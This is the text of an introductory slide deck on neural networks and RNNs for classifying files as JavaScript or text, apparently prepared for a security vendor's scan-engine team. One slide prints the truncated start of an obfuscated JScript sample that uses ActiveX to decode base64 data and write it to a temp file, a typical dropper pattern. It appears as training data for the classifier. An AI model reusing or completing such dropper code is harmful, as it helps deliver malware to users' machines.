An entry-level sharing for Trend Micro scan engine team members, using a binary script-type classification task as the running example. Topics start from machine learning problem definition and cover computational graphs for deep neural networks (DNN), recurrent neural networks, LSTM, GRU, and some RNN fine-tuning tricks.
2. Outline
1. Problem Definition
2. Walk through the RNN Model
3. How to Tune for the Best Result
4. (optional) View the Problem with a CNN
5. (optional) A Sequence-to-Sequence Problem (including HMM, CTC, Attention)
4. #1 Problem Definition
1. Representation: Define Problem, Sourcing Data, Cleaning, Normalization
2. Model: Model Structure, Cost Function, Optimization
3. Evaluation: Metrics, Explanation
5. 1-1 Define Problem (more tasks)
1. Representation: Define Problem, Sourcing Data, Cleaning, Normalization
Input: .txt file
Sequence Learning:
- Turn it into pseudo-code
- Output its behavior sequence (without running it)
- Summarize the code
- Learn when to segment
Generative Model:
- Code generation
- Code repatch
Supervised:
- Generate a hash code via similarity
- Decide the action to take (run in a sandbox or ...)
Unsupervised:
- Detect an unusual coding style
Reinforcement:
- Decide the next action according to PC status
6. 1-1 Define Problem
1. Representation: Define Problem, Sourcing Data, Cleaning, Normalization
Input: a .txt file; decide whether it is plain Text or JavaScript.
7. 1-2 Sourcing Data
1. Representation: Define Problem, Sourcing Data, Cleaning, Normalization
Where the .js samples (.txt files) come from: the Data Lake, the Web, benchmark datasets, and John's tool (Tim will share more).
8. 1-2 Sourcing Data: Sampling Bias
Samples from the Data Lake (Trend Micro), the Web, and benchmark datasets occupy different regions of the feature space (e.g., number of APIs used vs. number of lines).
A valid JS script may not appear in any of these banks - which one should we sample?
9. 1-3 Cleaning & Normalization
1. Representation: Define Problem, Sourcing Data, Cleaning, Normalization
Source file (.txt):
var evwfrEmu = new ActiveXObject("WScript.Shell");
//// 4fQei4pD7o69uOE8Trgp
YThMSpGKzmIcsQ = evwfrEmu.ExpandEnvironmentStrings("%TEMP%") + "ssd" + Math.round(1e8 * Math.random());
var lmXPGbOCL0 = new ActiveXObject("Msxml2.DOMDocument.6.0");
//// NN08kES93To
var MsslCA = new ActiveXObject("ADODB.Stream");
var dsgkpp = lmXPGbOCL0.createElement("tmp");
//// lZPifi9y
dsgkpp.dataType = "bin.base64";
//// wacLqE
//// bNloPOpvlZ8EdqKEn
MsslCA.Type = 1;
dsgkpp.text = "dmFyIGJUa3l
….
10. 1-3 Cleaning & Normalization
1. Representation: Define Problem, Sourcing Data, Cleaning, Normalization
Cleaned: "var evwfrE"
Normalized: [23, 2, 19, 0, 6, 23, 24, 7, 19, 32]
d = np.zeros((10, 98))   # data -> a sparse 2d matrix, one row per character
d[0, 23] = 1
d[1, 2] = 1
….
d[9, 32] = 1
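To make the normalization step concrete, here is a minimal numpy sketch. The character-to-index table below is a placeholder (98 printable symbols); the actual mapping behind the indices [23, 2, 19, ...] on the slide is not shown.

import numpy as np

# Placeholder vocabulary of 98 symbols; unseen characters fall back to index 0.
VOCAB = [chr(c) for c in range(32, 127)] + ['\t', '\n', '\r']   # 95 + 3 = 98 symbols
CHAR_TO_INDEX = {ch: i for i, ch in enumerate(VOCAB)}

def normalize(snippet, vocab_size=98):
    # Turn a cleaned snippet into a one-hot matrix: one row per character position.
    d = np.zeros((len(snippet), vocab_size))
    for t, ch in enumerate(snippet):
        d[t, CHAR_TO_INDEX.get(ch, 0)] = 1
    return d

X = normalize("var evwfrE")   # shape (10, 98), a sparse 2d matrix as on the slide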
11. 1-3 Cleaning & Normalization
1. Representation: Define Problem, Sourcing Data, Cleaning, Normalization
Raw data (.txt file) -> Cleaning -> cleaned data -> Normalization -> X
Each sample carries a label ȳ (js or not).
F(X) = P(.js), where X = <x_1, x_2, ..., x_n>
23. 2.1 Recall DNN, Model Structure
Input characters 'v', 'a', ..., 's', ..., 'E' feed the input layer; input neurons 1, 2, ..., j connect to hidden neurons 1, 2, ..., i, which connect to a single output neuron.
Input Layer ∈ R^(980x1), Hidden Layer ∈ R^(4x1), Output Layer ∈ R^(1x1)
Vertices here are scalars; edges here are operators.
24. 2.1 Recall DNN, Model Structure
Z_i = W_i1 * x_1 + ... + W_ij * x_j + ...
a_i = A(Z_i)
Input Layer: X ∈ R^(980x1)
Hidden Layer: a ∈ R^(4x1)
Output Layer: y ∈ R^(1x1)
Weights: W ∈ R^(4x980)
Activation Function: A: R -> R
25. 2.1 Recall DNN, Model Structure
a = A(W_0 X + b_0)
y = W_1 a + b_1
Input Layer: X ∈ R^(980x1)
Hidden Layer: a ∈ R^(4x1)
Output Layer: y ∈ R^(1x1)
Weights: W_0 ∈ R^(4x980), W_1 ∈ R^(1x4)
Bias: b_0 ∈ R^(4x1), b_1 ∈ R^(1x1)
Activation Function: A: R -> R
26. 2.1 Recall DNN, Model Structure = Inference
a = A(W_0 X + b_0)
y = W_1 a + b_1
if y > 0.5: JavaScript
else: TEXT
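As a sketch, the two-layer inference above in numpy; the weights are randomly initialized placeholders, and only the shapes (980 -> 4 -> 1) follow the slide:

import numpy as np

def A(z):                          # activation function (sigmoid assumed here)
    return 1.0 / (1.0 + np.exp(-z))

rng = np.random.default_rng(0)
W0, b0 = rng.normal(size=(4, 980)), np.zeros((4, 1))   # hidden layer
W1, b1 = rng.normal(size=(1, 4)),  np.zeros((1, 1))    # output layer

X = rng.random((980, 1))           # placeholder input vector
a = A(W0 @ X + b0)                 # a = A(W0 X + b0)
y = (W1 @ a + b1).item()           # y = W1 a + b1 (no output activation shown on the slide)
label = "JavaScript" if y > 0.5 else "TEXT"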
27. 2.1 Recall DNN, Model Structure = Inference
ŷ = f(X; θ) = y = P(.js)
θ = { W_0 ∈ R^(4x980), W_1 ∈ R^(1x4), b_0 ∈ R^(4x1), b_1 ∈ R^(1x1) }
|θ| = total number of parameters = 4*980 + 4 + 4 + 1 = 3929
28. 2.1 Recall DNN, Why Does It Work?
F(X) = P(.js): the target probability distribution; f(X; θ): the DNN model.
A neural network is a function approximator:
> Given enough variables, a NN can approximate any continuous function (the Universal Approximation Theorem).
Example: even a curve such as x^2 + (5y/4 - sqrt(|x|))^2 = 1 can be approximated.
29. 2.1 Recall DNN, Model Structure
Different NN structures are different ways to improve learnability:
Deep NN, Recurrent NN, Convolutional NN, other "Minecraft" NNs ...
30. 2.1 Recall DNN, Model Structure
Different NN structures are different ways to improve learnability:
Deep NN -> Deeper NN
31. 2.1 Recall DNN, Deeper Model Structure
Between Layer L-1 (neurons 1, 2, ..., j, ...) and Layer L (neurons 1, 2, ..., i, ...), with weights W_ij^L and pre-activations Z_i^L:
a_i^L = A(Z_i^L)
Z_i^L = W_i1^L * a_1^(L-1) + ... + W_ij^L * a_j^(L-1) + ...
a_i^L = A(W_i1^L * a_1^(L-1) + ... + W_ij^L * a_j^(L-1) + ...)
32. 2.1 Recall DNN, Deeper Model Structure
ŷ = f(X; θ) = A(W^L ... A(W^2 A(W^1 X + b^1) + b^2) ... + b^L)
θ = { W^1, b^1, W^2, b^2, ..., W^L, b^L }
Pick the best model = the best function = the best θ*
33. 2.1 Recall DNN, Deeper Model Structure
Input characters 'v', 'a', ... -> Input Layer (R^(980x1)) -> Hidden Layers -> Output Layer (R^(1x1))
f_θ: R^980 -> R^1
This is a Fully Connected Network - vectorize it!
34. 2.1 Recall DNN, Deeper Model Structure (vector)
Layer L-1 has N_(L-1) nodes; Layer L has N_L nodes.
Output of a neuron: a_i^L (neuron i in Layer L).
Output of one layer: a^L, a vector.
35. 2.1 Recall DNN, Deeper Model Structure (vector)
Weight: W_ij^L connects neuron j in Layer L-1 to neuron i in Layer L.
W^L = [ W_11^L  W_12^L  ... ;  W_21^L  W_22^L  ... ;  ... ] ∈ R^(N_L x N_(L-1))
36. 2.1 Recall DNN, Deeper Model Structure (vector)
Bias: b_i^L is the bias for neuron i at Layer L.
b^L = [ b_1^L ; b_2^L ; ... ; b_i^L ; ... ] ∈ R^(N_L x 1)
37. 2.1 Recall DNN, Deeper Model Structure (vector)
Input of a neuron: z_i^L, the input of the activation function for neuron i at Layer L.
Input of one layer: z^L, a vector.
38. 2.1 Recall DNN, Deeper Model Structure (vector)
z_i^L = W_i1^L a_1^(L-1) + W_i2^L a_2^(L-1) + ... + b_i^L = Σ_(j=1..N_(L-1)) W_ij^L a_j^(L-1) + b_i^L
39. 2.1 Recall DNN, Deeper Model Structure (vector)
z_1^L = W_11^L a_1^(L-1) + W_12^L a_2^(L-1) + ... + b_1^L
z_2^L = W_21^L a_1^(L-1) + W_22^L a_2^(L-1) + ... + b_2^L
...
z_i^L = W_i1^L a_1^(L-1) + W_i2^L a_2^(L-1) + ... + b_i^L
In matrix form:
[ z_1^L ; z_2^L ; ... ; z_i^L ] = [ W_11^L  W_12^L  ... ;  W_21^L  W_22^L  ... ;  ... ] [ a_1^(L-1) ; a_2^(L-1) ; ... ] + [ b_1^L ; b_2^L ; ... ; b_i^L ]
(The weight matrix is N_L x N_(L-1); the z and bias vectors are N_L x 1.)
40. 2.1 Recall DNN, Deeper Model Structure (vector)
The same matrix form, written compactly:
z^L = W^L a^(L-1) + b^L
41. 2.1 Recall DNN, Deeper Model Structure (vector)
Relation between a layer's input and output: apply the activation element-wise,
a_i^L = A(z_i^L), so a^L = A(z^L) = [ A(z_1^L) ; A(z_2^L) ; ... ; A(z_(N_L)^L) ], a vector.
42. 2.1 Recall DNN, Deeper Model Structure (vector)
z^L = W^L a^(L-1) + b^L,  a^L = A(z^L)
a^L = A(W^L a^(L-1) + b^L)
Computational graph: a^(L-1), W^L, b^L -> z^L -> a^L
Nodes are tensors; edges are operators.
43. 2.1 Recall DNN, Deeper Model Structure (vector)
z^L = W^L a^(L-1) + b^L,  a^L = A(z^L), so a^L = A(W^L a^(L-1) + b^L)
Computational graph: a^(L-1), W^L, b^L -> z^L -> a^L (nodes are tensors; edges are operators).
44. 2.1 Recall DNN, Deeper Model Structure
Input 'v', 'a', ... -> Layer 1 (W^1, b^1) -> Layer 2 (W^2, b^2) -> ... -> Layer L (W^L, b^L) -> Output
f_θ: R^980 -> R^1
ŷ = f(X; θ) = A(W^L ... A(W^2 A(W^1 X + b^1) + b^2) ... + b^L)
45. 2.1 Recall DNN, Deeper Model Structure
ŷ = f(X; θ) = A(W^L ... A(W^2 A(W^1 X + b^1) + b^2) ... + b^L)
Computational graph: X, W^1, b^1 -> z^1 -> a^1 -> z^2 -> ... -> a^(L-1), W^L, b^L -> z^L
Nodes are tensors; edges are operators.
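A sketch of this layered forward pass in numpy; apart from the 980-dimensional input and 1-dimensional output, the layer sizes and weights below are placeholders:

import numpy as np

def A(z):                                    # element-wise activation
    return np.tanh(z)

layer_sizes = [980, 128, 32, 1]              # only 980 and 1 come from the slides
rng = np.random.default_rng(0)
params = [(rng.normal(scale=0.1, size=(n_out, n_in)), np.zeros((n_out, 1)))
          for n_in, n_out in zip(layer_sizes[:-1], layer_sizes[1:])]

def forward(X, params):
    # f(X; theta) = A(W^L ... A(W^2 A(W^1 X + b^1) + b^2) ... + b^L)
    a = X
    for W, b in params:
        z = W @ a + b                        # z^l = W^l a^(l-1) + b^l
        a = A(z)                             # a^l = A(z^l)
    return a

y = forward(rng.random((980, 1)), params)    # shape (1, 1)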
46. 2.1 Recall DNN, Deeper Model Structure
ŷ = f(X; θ) = A(W^L ... A(W^2 A(W^1 X + b^1) + b^2) ... + b^L)
θ = { W^1, b^1, W^2, b^2, ..., W^L, b^L }
Pick the best model = the best function = the best θ*
47. 2.1 Recall DNN, Deeper Model Structure
ŷ = f(X; θ) = A(W^L ... A(W^2 A(W^1 X + b^1) + b^2) ... + b^L)
θ = { W^1, b^1, W^2, b^2, ..., W^L, b^L }
Pick the best model = the best function = the best θ*
2. Model: Model Structure (the set of functions), Cost Function, Optimization
48. 2.1 Recall DNN, Cost Function
Cost Function C(θ): how bad the parameters are (also called the loss / error function).
Objective Function O(θ): how good the parameters are.
2. Model: Model Structure, Cost Function, Optimization
49. 2.1 Recall DNN, Cost Function
Cost Function C(θ): how bad the parameters are (also called the loss / error function).
Best parameter: θ* = arg min_θ C(θ)
2. Model: Model Structure, Cost Function, Optimization
50. 2.1 Recall DNN, Cost Function
Cost Function C(θ): how bad the parameters are (also called the loss / error function).
F(X) = P(.js): the real probability distribution; f(X; θ): the DNN model. The cost measures distance(F, f_θ).
51. 2.1 Recall DNN, Cost Function
We don't actually know the real distribution function.
52. 2.1 Recall DNN, Cost Function
Real probability distribution over X -> sample a dataset from the real world: (X_1, ȳ_1), (X_2, ȳ_2), (X_3, ȳ_3), ...
Machine learning model: C(θ) = (1/k) Σ_k loss(ŷ_k, ȳ_k)
Wrong content!! Classification and regression are not going to learn a probability distribution.
53. 2.1 Recall DNN, Cost Function
Sample a dataset from the real world: (X_1, ȳ_1), (X_2, ȳ_2), (X_3, ȳ_3), ..., with labels ȳ_1 = 1 for js and ȳ_2 = 0 for a .txt file.
C(θ) = (1/k) Σ_k loss(ŷ_k, ȳ_k)
Wrong content!! Classification and regression are not going to learn a probability distribution.
54. 2.1 Recall DNN, Cost Function, MSE as Loss
C(θ) = (1/k) Σ_k loss(ŷ_k, ȳ_k) = (1/k) Σ_k ‖ŷ_k - ȳ_k‖
(Dataset sampled from the real world; labels ȳ_1 = 1 for js, ȳ_2 = 0 for a .txt file.)
Wrong content!! Classification and regression are not going to learn a probability distribution.
55. 2.1 Recall DNN, Cost Function, Cross Entropy as Loss
C(θ) = (1/k) Σ_k loss(ŷ_k, ȳ_k)
C(θ) = -(1/k) Σ_k ( ȳ_k ln(ŷ_k) + (1 - ȳ_k) ln(1 - ŷ_k) )
(Dataset sampled from the real world; labels ȳ_1 = 1 for js, ȳ_2 = 0 for a .txt file.)
Wrong content!! Classification and regression are not going to learn a probability distribution.
56. 2.1 Recall DNN, Cost Function, MSE as Loss
C(θ) = (1/k) Σ_k loss(ŷ_k, ȳ_k)
To visualize how the cost functions differ, write the loss as Φ(ŷ_k · ȳ_k) with ŷ_k, ȳ_k ∈ {-1, 1} and let z = ŷ·ȳ:
Accuracy: L(z) = (sign(z) + 1) / 2
Logistic: L(z) = log(exp(-z) + 1) / log(2)
MSE: L(z) = (ȳ - ŷ)^2 = (1 - z)^2  (using ȳ^2 = 1)
Hinge: L(z) = max(0, 1 - z)
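The curves above written out in numpy (a sketch for visualization only), with labels in {-1, +1} and z = ŷ·ȳ:

import numpy as np

z = np.linspace(-3, 3, 601)                    # z = y_hat * y_bar
accuracy = (np.sign(z) + 1) / 2                # 1 when prediction and label agree in sign
logistic = np.log(np.exp(-z) + 1) / np.log(2)
mse      = (1 - z) ** 2                        # (y_bar - y_hat)^2 = (1 - z)^2 when y_bar^2 = 1
hinge    = np.maximum(0, 1 - z)
# plot z against each curve to compare how the losses penalize wrong-signed predictions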
58. 2.1 Recall DNN, Optimization
Find the best function, i.e. the best model parameter θ (with cost C(θ)).
For simplicity, consider a θ that has only one variable:
1. Randomly start at θ_0
2. Compute dC(θ_0)/dθ
3. θ_1 <- θ_0 - η * dC(θ_0)/dθ
4. Compute dC(θ_1)/dθ
5. θ_2 <- θ_1 - η * dC(θ_1)/dθ
...
η is the learning rate.
59. 2.1 Recall DNN, Optimization
Set the learning rate η carefully (same one-variable update steps as above).
Figure copied from http://speech.ee.ntu.edu.tw/~tlkagk/courses/MLDS_2015_2/Lecture/DNN%20(v4).pdf
60. 2.1 Recall DNN, Optimization
Find the best function. Suppose θ has two variables, θ_1 and θ_2:
1. Randomly start at θ^0 = [ θ_1^0 ; θ_2^0 ]
2. Compute the gradient of C(θ) at θ^0: ∇C(θ^0) = [ ∂C(θ^0)/∂θ_1 ; ∂C(θ^0)/∂θ_2 ]
3. Update the parameters: [ θ_1^1 ; θ_2^1 ] <- [ θ_1^0 ; θ_2^0 ] - η * ∇C(θ^0), and so on.
(On the contour plot of C(θ), each movement is opposite to the gradient.)
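A sketch of the two-variable gradient descent loop; the quadratic cost below is a placeholder, and only the update rule θ <- θ - η∇C(θ) comes from the slide:

import numpy as np

def C(theta):                                   # placeholder cost with minimum at (1, -2)
    return (theta[0] - 1.0) ** 2 + (theta[1] + 2.0) ** 2

def grad_C(theta):                              # gradient [dC/dtheta_1, dC/dtheta_2]
    return np.array([2 * (theta[0] - 1.0), 2 * (theta[1] + 2.0)])

eta = 0.1                                       # learning rate
theta = np.random.default_rng(0).normal(size=2) # 1. random start theta^0
for step in range(100):
    theta = theta - eta * grad_C(theta)         # 2.-3. compute gradient, update parameters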
61. 2.1 Recall DNN, Optimization
Optimize our model (layers L-1 -> L, with weights W_ij^L and pre-activations Z_i^L):
1. Randomly start at θ^0
2. Compute the gradient of C(θ) at θ^0: ∇C(θ^0)
3. Update the parameters: θ^1 <- θ^0 - η * ∇C(θ^0)
To calculate ∇C(θ^0), we need all of
{ ∂C(θ^0)/∂W_11^1, ∂C(θ^0)/∂b_1^1, ∂C(θ^0)/∂W_12^1, ∂C(θ^0)/∂b_2^1, ..., ∂C(θ^0)/∂W_ij^L, ∂C(θ^0)/∂b_i^L }
62. 2.1 Recall DNN, Differentiation on a Computational Graph
Chain rule, case 1: x -> y -> z with y = g(x), z = h(y), so z = f(x):
dz/dx = dz/dy * dy/dx
Chain rule, case 2: t = g(s), u = h(s), z = k(t, u), so z = f(s):
dz/ds = ∂z/∂t * ∂t/∂s + ∂z/∂u * ∂u/∂s
63. 2.1 Recall DNN, Differentiation on a Computational Graph
Example: y = x * exp(x*x), decomposed as u = x*x, v = exp(u), w = x*v.
Computational graph: x -> u (via **), u -> v (via exp()), x and v -> w (via *), y = w.
64. 2.1 Recall DNN, Differentiation on a Computational Graph
Example: y = x * exp(x*x), with u = x*x, v = exp(u), w = x*v.
Forward pass at x = 2: u = 4, v = e^4, w = 2*e^4, so y = 2*e^4.
65. 2.1 Recall DNN, Differentiation on a Computational Graph
Example: y = x * exp(x*x), with u = x*x, v = exp(u), w = x*v. What is dy/dx at x = 2?
Backward pass, derivatives on each edge:
∂u/∂x = x  (for each of the two edges from x into u - warning: these are different uses of the same x)
∂v/∂u = exp(u) = exp(x^2)
∂y/∂v = x
∂w/∂x = v = exp(u) = exp(x^2)
66. 2.1 Recall DNN, Differentiation on a Computational Graph
Backward pass at x = 2 (u = 4, v = e^4, y = 2*e^4), using the edge derivatives ∂u/∂x = x, ∂v/∂u = exp(x^2), ∂y/∂v = x, ∂w/∂x = v = exp(x^2):
Path through u: ∂y/∂v * ∂v/∂u * ∂u/∂x = x * exp(x^2) * x
67. 2.1 Recall DNN, Differentiation on a Computational Graph
Backward pass at x = 2, continued: each of the two edges from x into u contributes a path product ∂y/∂x = x * exp(x^2) * x, and the direct edge contributes ∂w/∂x = v = exp(x^2).
68. 2.1 Recall DNN, Differentiation on a Computational Graph
Summing all paths:
dy/dx = 2*x^2*exp(x^2) + exp(x^2)
At x = 2 this gives 9*exp(4) (the forward pass gave y = 2*e^4).
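A numerical check of the forward and backward passes above (a minimal sketch):

import numpy as np

x = 2.0
u = x * x                                   # u = x*x = 4
v = np.exp(u)                               # v = exp(u) = e^4
y = x * v                                   # forward pass: y = 2*e^4

dy_dv = x                                   # from w = x*v
dv_du = np.exp(u)                           # from v = exp(u)
du_dx = 2 * x                               # two edges from x into u, each contributing x
dy_dx = v + dy_dv * dv_du * du_dx           # direct path + paths through u
assert np.isclose(dy_dx, 9 * np.exp(4))     # = exp(x^2) * (1 + 2*x^2) at x = 2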
71. 2.1 Recall DNN, Optimization (batch)
Training data: { (X_1, ȳ_1), (X_2, ȳ_2), ..., (X_r, ȳ_r), ..., (X_R, ȳ_R) }
- Gradient Descent: θ_i <- θ_(i-1) - η * ∇C(θ_(i-1)), with C(θ_(i-1)) = (1/R) Σ_r C_r(θ_(i-1)) - use all samples for each update.
- Stochastic Gradient Descent: θ_i <- θ_(i-1) - η * ∇C_r(θ_(i-1)) - use one sample for each update.
- Mini-Batch Gradient Descent: θ_i <- θ_(i-1) - η * ∇C(θ_(i-1)), with C(θ_(i-1)) = (1/B) Σ_(r ∈ b) C_r(θ_(i-1)) - use one batch b of B samples for each update.
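A sketch contrasting the three update schemes; the per-sample gradient and the data below are placeholders standing in for ∇C_r(θ):

import numpy as np

rng = np.random.default_rng(0)
R = 1000
data = rng.normal(size=(R, 2))                        # placeholder samples (x_r, y_bar_r)

def grad_Cr(theta, sample):
    x, y_bar = sample                                 # squared error on a 1-d linear model
    return 2 * (theta * x - y_bar) * x

eta, theta = 0.01, 0.0
# Gradient Descent: average the gradient over all R samples for each update.
theta -= eta * np.mean([grad_Cr(theta, s) for s in data])
# Stochastic Gradient Descent: use one sample for each update.
theta -= eta * grad_Cr(theta, data[rng.integers(R)])
# Mini-Batch Gradient Descent: average over a batch b of B samples for each update.
B = 32
batch = data[rng.choice(R, size=B, replace=False)]
theta -= eta * np.mean([grad_Cr(theta, s) for s in batch])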
72. 2.2 Let's Go Back to RNN
- Why is memory important?
- What kind of problems can be handled by an RNN?
- The simple RNN structure
- Why is it so hard to train?
- Classic variants (LSTM, GRU)
94. 2.3 Simple RNN, Cost Function
ŷ = f(X_t, h; θ) = A(W_i * X_t + W_h * h + b), applied per timestep
θ = { W_i, W_h, b }
Pick the best model = the best function = the best θ*
2. Model: Model Structure (the function set), Cost Function, Optimization
C(θ) = -(1/k) Σ_k ( ȳ_k ln(ŷ_k) + (1 - ȳ_k) ln(1 - ŷ_k) )
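A sketch of this simple RNN cell unrolled over the character sequence; the hidden size and the readout layer (Wo, bo) that maps the final hidden state to P(.js) are assumptions not spelled out on the slide:

import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

vocab, hidden = 98, 16                                # 98 from the one-hot encoding; 16 assumed
rng = np.random.default_rng(0)
Wi = rng.normal(scale=0.1, size=(hidden, vocab))      # input-to-hidden weights
Wh = rng.normal(scale=0.1, size=(hidden, hidden))     # hidden-to-hidden weights
b  = np.zeros((hidden, 1))
Wo, bo = rng.normal(scale=0.1, size=(1, hidden)), np.zeros((1, 1))   # assumed readout

def rnn_forward(X_seq):
    # X_seq: (T, vocab) one-hot rows; h_t = A(Wi x_t + Wh h_(t-1) + b)
    h = np.zeros((hidden, 1))
    for x_t in X_seq:
        h = np.tanh(Wi @ x_t.reshape(-1, 1) + Wh @ h + b)
    return sigmoid(Wo @ h + bo)                       # y_hat read from the last timestep

y_hat = rnn_forward(np.eye(vocab)[[23, 2, 19, 0, 6, 23, 24, 7, 19, 32]])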
95. 2.3 Simple RNN, Optimization, Back-Propagation?
ŷ = f(X_t, h; θ) = A(W_i * X_t + W_h * h + b), applied per timestep
θ = { W_i, W_h, b }
Pick the best model = the best function = the best θ*
2. Model: Model Structure (the function set), Cost Function, Optimization
C(θ) = -(1/k) Σ_k ( ȳ_k ln(ŷ_k) + (1 - ȳ_k) ln(1 - ŷ_k) )
99. 2.3 Simple RNN, BPTT, Gradient Problem
Inputs X_1, X_2, X_3, X_4, X_5, ..., X_10 are the characters 'v', 'a', 'r', ' ', 'e', ..., 'E', and the target is js.
The error signal δ passes through an "amplifier" (the recurrent weight) at every timestep, so updating W needs Error Signal * (Amplifier)^10.
This causes the vanishing / exploding gradient problem.
100. 2.3 Simple RNN, BPTT, Gradient Problem
Updating W needs Error Signal * (Amplifier)^10: the gradient either vanishes or explodes (a direction with a very large value), even on an input as short as "var exwFrE".
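One common mitigation for the exploding side of the problem (not shown on the slides) is gradient-norm clipping; a minimal sketch, assuming the gradients arrive as a list of arrays:

import numpy as np

def clip_by_global_norm(grads, max_norm=5.0):
    # Rescale all gradient arrays so their combined L2 norm is at most max_norm.
    total = np.sqrt(sum(np.sum(g ** 2) for g in grads))
    scale = min(1.0, max_norm / (total + 1e-12))
    return [g * scale for g in grads]

# usage: grads = clip_by_global_norm(grads); then theta <- theta - eta * grad as usual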
112. 3 How to Tune Your Model
- Basic Metrics
- Model Hyperparameters
- Visualization Inspiration
- Optimization Setup
- Network Structure
113. 3.1 Basic Metrics
Dataset vs. real world: split into Training Data and Testing Data; the training portion is further split into Training Data and Validation Data, with the real testing kept aside.
Do I get good results on the training set?
- No: does the code have a bug? Can we not find a good function? Bad model (no good function in the hypothesis set)?
- Yes: do I get good results on the validation set?
  - No: overfitting?
114. 3.2 Model Hyperparameters
Simple RNN: ŷ = f(X_t, h; θ) = σ(W_i * X_t + W_h * h + b), θ = { W_i, W_h, b } - these are the parameters.
The hyperparameters include:
- number of epochs (training iterations)
- |h|: hidden layer size
- number of layers
- C(): the cost function
- batch size (stochastic, mini-batch, ...)
- parameter initial values
- A: the activation function (tanh, sigmoid, ReLU)
- η: the learning rate in θ_1 <- θ_0 - η * ∇C(θ_0)
- regularization (Dropout, Zoneout)
- forget gate bias
- gate initialization
- implicit zero padding
Grid search?
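The "Grid search?" question, sketched with itertools over a few of the listed hyperparameters; the value grids and the train_and_validate helper below are placeholders:

import itertools

grid = {
    "hidden_size":   [16, 32, 64],            # |h|
    "learning_rate": [1e-2, 1e-3],            # eta
    "batch_size":    [16, 64],
    "activation":    ["tanh", "sigmoid", "relu"],
}

def train_and_validate(config):
    # Placeholder: train the RNN with this config and return validation accuracy.
    return 0.0

best = None
for values in itertools.product(*grid.values()):
    config = dict(zip(grid.keys(), values))
    score = train_and_validate(config)
    if best is None or score > best[0]:
        best = (score, config)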
119. 4. View the Problem with a CNN
"var evwfrE" -> [23, 2, 19, 0, 6, 23, 24, 7, 19, 32] -> a 98x10 one-hot matrix (one column per character):
0 0 0 0 0 0 0 1 0 0
0 0 0 0 0 0 0 0 0 1
0 0 1 0 0 0 0 0 0 0
1 0 0 1 0 1 0 0 0 0
....
0 1 0 0 1 0 1 0 0 0
0 0 0 0 0 0 0 0 1 0
Treat the columns x_1, x_2, ..., x_9, x_0 as an "image", slide a filter of width r over it, and pool the resulting feature map into the output y.
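A sketch of this CNN view in numpy: slide one filter of width r over the 98x10 one-hot matrix and pool the feature map (the filter values and r = 3 are placeholders):

import numpy as np

X = np.eye(98)[[23, 2, 19, 0, 6, 23, 24, 7, 19, 32]].T   # 98 x 10 one-hot "image"
rng = np.random.default_rng(0)
r = 3                                                     # receptive field over characters
filt = rng.normal(scale=0.1, size=(98, r))                # one convolutional filter

feature_map = np.array([np.sum(filt * X[:, t:t + r])      # slide the filter along the sequence
                        for t in range(X.shape[1] - r + 1)])
y = feature_map.max()                                     # e.g. max-pool down to one score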
120. 5 A Sequence-to-Sequence Problem
- Three different ways to solve the problem: HMM, CTC, Attention
121. Topics Not Covered
- Bi-directional RNNs and other RNN variants
- Attention-based RNNs
- Structured learning vs. RNNs
122. Reference
- Most of the content is from Prof. Lee @ NTU: http://speech.ee.ntu.edu.tw/~tlkagk/courses/
- https://danijar.com/tips-for-training-recurrent-neural-networks/
- https://medium.com/@erikhallstrm/hello-world-rnn-83cd7105b767
These slides were shared with the Trend Micro scan engine team as an entry-level sharing for team members on 2017/9/4.
For any suggestions or corrections, please mail chuchuhao831@gmail.com or just leave a comment on the Google Slides -> link